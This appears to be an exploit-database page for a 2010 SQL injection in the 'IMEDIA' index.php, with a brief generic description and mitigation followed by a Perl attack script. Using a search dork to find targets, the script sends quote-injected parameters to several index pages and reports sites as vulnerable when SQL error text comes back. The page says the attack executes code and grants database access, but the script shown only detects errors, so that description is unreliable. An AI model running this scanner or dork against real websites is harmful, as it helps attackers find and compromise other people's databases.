IMEDIA (index.php) SQL Injection Vulnerability

vendor:

N/A

by:

Kannibal615

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: ALL

2010

IMEDIA (index.php) SQL Injection Vulnerability

IMEDIA (index.php) SQL Injection Vulnerability is a vulnerability that allows an attacker to inject malicious SQL code into an application, allowing them to access, modify, or delete data from the database. This vulnerability was discovered by Kannibal615 in 2010 and affects all versions of the software. The exploit is triggered by using a specially crafted DORK (Powered by: Con-Imedia) and sending a malicious HTTP request to the target. The malicious code is then executed, allowing the attacker to gain access to the database.

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in a SQL query. Use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Titre: IMEDIA (index.php) SQL Injection Vulnerability
# Date: 19-05-2010
# Auteur: Kannibal615
# Link Software: N/A
# Version: N/A
# Testé sur: ALL
# CVE: N/A
# Code: 

# DORK : Powered by: Con-Imedia


#!usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

system ("cls");
print "\n";
print "  @@    @@  @@@@@@     @@    @@    @@@@    @@@@@@@  @@  @@   @@@@@@@  @@@@@\n";
print "  @@    @@  @@   @@    @@    @@   @@  @@   @@       @@ @@    @@       @@   @@\n";
print "  @@    @@  @@ @@@     @@@@@@@@  @@    @@  @@       @@@@     @@@@@@   @@   @@\n";
print "   @@  @@   @@ @@@     @@@@@@@@  @@@@@@@@  @@       @@ @@    @@@@@@   @@ @@\n";
print "    @@@@    @@   @@    @@    @@  @@    @@  @@       @@  @@   @@       @@   @@\n";
print "     @@     @@@@@@     @@    @@  @@    @@  @@@@@@@  @@   @@  @@@@@@@  @@    @@\n\n";
print "                  LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAH\n\n";
print "\n\n";
print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]de\n\n";
print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATOR\n";
print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru$_T4ckJ3n';
print "\n[*]Greetz 3: To All VBHACKER.NET Members\n";
print "[*]Dork    : Powered by: Con-Imedia\n";
print "[*]Usage   : k615>[target here]\n";
print "[*]Exemple : k615> www.target.com\n";
print "\n";
print "k615>";

$input=<>;
chomp $input;

if ( $input !~ /^http:/ ) {
$input = 'http://' . $input;
}
if ( $input !~ /\/$/ ) {
$input = $input . '/';
}


@path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"',
'index2.php?linkid=999.9"','index3.php?day=999.9"');

foreach $ways(@path){

$final=$input.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /sql/ ||
$response->content =~ /SQL error/ ||
$response->content =~ /SQL/ ||
$response->content =~ /syntax/ ||
$response->content =~ /Invalid query/ ||
$response->content =~ /your SQL/ ||
$response->content =~ /MySQL/ ||
$response->content =~ /at line 1/ ||
$response->content =~ /MySQL server/ ||
$response->content =~ /version for/ ||
$response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ ||
$response->content =~ /fetch/
){
print "[+] Vulnerable -> $final\n";
}
else{
print "[-] Not Vulner <- $final\n";
}
}
print "\n\nSOBHAN ALLAH\n";
print "press enter to exit";
$enter=<>;




#db-exploit 19-05-2010
#Coded By Kannibal615
#Tunisian Genius Security